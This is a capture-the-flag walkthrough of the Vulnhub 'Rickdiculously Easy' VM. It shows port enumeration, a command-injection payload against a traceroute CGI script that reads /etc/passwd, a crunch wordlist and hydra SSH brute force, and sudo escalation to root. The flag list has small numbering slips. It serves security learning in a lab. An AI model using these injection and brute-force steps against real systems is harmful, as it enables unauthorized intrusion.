Vulnhub Walkthrough: Rickdiculously Easy: 1

Enumeration

nmap


root@kali:~/ctf/rickdiculouslyeasy# nmap -Pn -p- 10.0.2.12 -oN nmap.txt

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-10-08 14:27 EDT
Nmap scan report for 10.0.2.12
Host is up (0.00012s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
9090/tcp open zeus-admin
13337/tcp open unknown
22222/tcp open unknown
60000/tcp open unknown
MAC Address: 08:00:27:BF:52:95 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 15.46 seconds

Port 60000

I decided to start looking at the higher ports first, since they appeared to be non-standard services. A quick netcat connection to port 60000 revealed a custom shell with a flag saved in a text file.


root@kali:~/ctf/rickdiculouslyeasy# nc -nv 10.0.2.12 60000
(UNKNOWN) [10.0.2.12] 60000 (?) open
Welcome to Ricks half baked reverse shell...
# pwd
/root/blackhole/
# ls
FLAG.txt
# cat FLAG.txt
FLAG{Flip the pickle Morty!} - 10 Points
#

Port 22222

An alternate SSH service was running on port 22222.


root@kali:~/ctf/rickdiculouslyeasy# nc -nv 10.0.2.12 22222
(UNKNOWN) [10.0.2.12] 22222 (?) open
SSH-2.0-OpenSSH_7.5

Port 13337

A custom service was running on port 13337. Connecting to it with netcat revealed the second flag.


root@kali:~/ctf/rickdiculouslyeasy# nc -nv 10.0.2.12 13337
(UNKNOWN) [10.0.2.12] 13337 (?) open
FLAG:{TheyFoundMyBackDoorMorty}-10Points

Port 9090

Nikto generated a ton of false positives. Dirb found a file at https://10.0.2.12:9090/ping. I decided to try some manual enumeration. Upon navigating to the web server on 9090, the third flag was revealed:

Port 80

Nikto found a directory called passwords on the web server.


root@kali:~/ctf/rickdiculouslyeasy# nikto -h 10.0.2.12 -o nikto.txt
- Nikto v2.1.6/2.1.5
+ Target Host: 10.0.2.12
+ Target Port: 80
+ GET Server leaks inodes via ETags, header found with file /, fields: 0x146 0x557458caf66e2
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OPTIONS Allowed HTTP Methods: POST, OPTIONS, HEAD, GET, TRACE
+ OSVDB-877: TRACE HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: GET /passwords/: Directory indexing found.
+ OSVDB-3092: GET /passwords/: This might be interesting...
+ OSVDB-3268: GET /icons/: Directory indexing found.
+ OSVDB-3233: GET /icons/README: Apache default file found.

Dirb also found the passwords directory, and a robots.txt file.


root@kali:~/ctf/rickdiculouslyeasy# dirb http://10.0.2.12 -o dirb.txt
...
---- Scanning URL: http://10.0.2.12/ ----
+ http://10.0.2.12/cgi-bin/ (CODE:403|SIZE:217)
+ http://10.0.2.12/index.html (CODE:200|SIZE:326)
==> DIRECTORY: http://10.0.2.12/passwords/
+ http://10.0.2.12/robots.txt (CODE:200|SIZE:126)
...

Port 22


root@kali:~/ctf/rickdiculouslyeasy# nc -nv 10.0.2.12 22
(UNKNOWN) [10.0.2.12] 22 (ssh) open
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
root@kali:~/ctf/rickdiculouslyeasy#

Port 21

I found that anonymous FTP access was enabled by using the ftp-anon NSE script with nmap.


root@kali:~/ctf/rickdiculouslyeasy# nmap -Pn -p 21 10.0.2.12 --script=ftp-anon

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-10-08 14:49 EDT
Nmap scan report for 10.0.2.12
Host is up (0.00026s latency).
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 42 Aug 22 05:10 FLAG.txt
|_drwxr-xr-x 2 0 0 6 Feb 12 2017 pub
MAC Address: 08:00:27:BF:52:95 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds
root@kali:~/ctf/rickdiculouslyeasy#

Since the flag was right there, I went ahead and grabbed it.

At this point, basic enumeration was complete and I had already found 4 flags totaling 40 points.

Web Services

I spend several minutes unsuccessfully trying to fix the seemingly broken login on port 9090. I then decided to pivot to the web service on port 80.

A quick check of the /passwords/ directory revealed a passwords.html file and the 5th flag,FLAG{Yeah d- just don’t do it.} – 10 Points, in FLAG.txt.

The passwords.html file contained a message from Rick berating Morty for storing passwords in an html file. Rick did Morty a favor and hid the password in an html comment.

The robots.txt file contained another custom message from Rick. The non-standard format of the file explains why nikto didn’t detect it during its scan. Two cgi scripts,root_shell.cgi and tracertool.cgi, were contained in the file. The first one seemed like a home run, so I eagerly navigated to /cgi-bin/root_shell.cgi. To my disappointment, the root shell was still under construction…

On the other hand, tracertool.cgi appeared to be working. I followed the instructions and entered an IP address to trace. The script appeared to be running traceroute in the backend to trace a packets path. My immediate though was command inject, so I tested with “127.0.0.1; cat /etc/passwd”.

Of course, the cat binary had been replace to display an ASCII art image of a cat. A troll from Rick most likely. I tried again, this time replacing “cat /etc/passwd” with “head -n 100 /etc/passwd”. It worked like a charm.

The contents of the passwd file revealed 3 user accounts on the system: RickSanchez, Morty, and Summer. I tried several variations of wget and curl to pull down a meterpreter payload through via the command execution vulnerability to no avail.

FTP and SSH

Since I had a list of users and a password, I decided to try to authenticate to the FTP and SSH services. I tried credentials of Morty:winter on both services with no luck. It took longer than I care to admit to recognize the connection between the user ‘Summer’ and the password ‘winter’. These credentials allowed me to successfully authenticated to the server via SSH on port 22222. I immediately discovered the 6th flag, FLAG{Get off the high road Summer!} – 10 Points, in Summer’s home directory.

As luck would have it, Summer had read access to files in both Morty and Rick’s home directories. Morty’s home directory contained two files: journal.txt.zip and Safe_Password.jpg. I copied both files to Summer’s home directory and pulled them down with ftp. I ran strings on Safe_Password.jpg to reveal the password to Morty’s password protected journal.

I used the ‘Meeseek’ password to unzip Morty’s journal. The entry from Monday referenced a ‘safe password’ and contained the 7th flag, FLAG: {131333} – 20 Points.

Moving on to RickSanchez’s home directory, I found an elf binary called “safe” within the RICKS_SAFE directory. I copied this file to Summer’s home directory and ran it. The binary returned string output of Past Rick telling present Rick to tell future Rick to use command line arguments. I reran to binary with ‘131333’ as an argument, which uncovered flag 8, FLAG{And Awwwaaaaayyyy we Go!} – 20 Points, and hints for Rick to recover his password in case he forgot it. Rick also appears to imply that his account is a member of the wheel group.

Becoming Rick

So according to Rick, his password should begin with an uppercase letter, followed by a digit, and end with one of the words from the name of his old band. According to the Rick and Morty wiki at http://rickandmorty.wikia.com/wiki/, Rick was in a band called “The Flesh Curtains” with Birdperson and Squanchy. To generate a wordlist from these hints, I used the crunch tool.


root@kali:~/ctf/rickdiculouslyeasy# crunch 7 7 -t ,%Flesh > band_pass.txt
root@kali:~/ctf/rickdiculouslyeasy# crunch 10 10 -t ,%Curtains >> band_pass.txt

I then used hydra to brute force the RickSanchez account with the newly created wordlist.


root@kali:~/ctf/rickdiculouslyeasy# hydra -l RickSanchez -P band_pass.txt 10.0.2.12 ssh -s 22222

Becoming Root

I logged into the RickSanchez account using the password “P7Curtains”. I remembered Ricks reference to the wheel group in his safe hints, so I ran sudo -l to check his sudo permissions. Since he could run any command as root, I sudo su’d to root.

Finally, I found the 8th flag, FLAG: {Ionic Defibrillator} – 30 points, in root’s home directory.

Summary

This was a fun little boot2root machine with a few twists along the way. I really enjoyed the Rick and Morty themed puzzles. Overall, this was a fun and relaxing puzzle for a rainy Sunday afternoon.

Flags Summary

# Value Flag Location
1 10 FLAG{Whoa this is unexpected} /var/ftp/FLAG.txt (anonymous ftp)
2 10 FLAG{Yeah d- just don’t do it.} http://10.0.2.12/passwords/FLAG.txt
3 10 FLAG{TheyFoundMyBackDoorMorty} Service on Port 13337
4 10 FLAG{There is no Zeus, in your face!} https://10.0.2.12:9090/
5 10 FLAG{Flip the pickle Morty!} Rick’s half baked reverse shell (Port 6000)
6 10 FLAG{Get off the high road Summer!} /home/Summer/FLAG.txt
7 20 FLAG: {131333} /home/Morty/journal.txt.zip
8 20 FLAG{And Awwwaaaaayyyy we Go!} /home/RickSanchez/RICKS_SAFE/safe 13133
9 30 FLAG: {Ionic Defibrillator} /root/FLAG.txt

Leave a Reply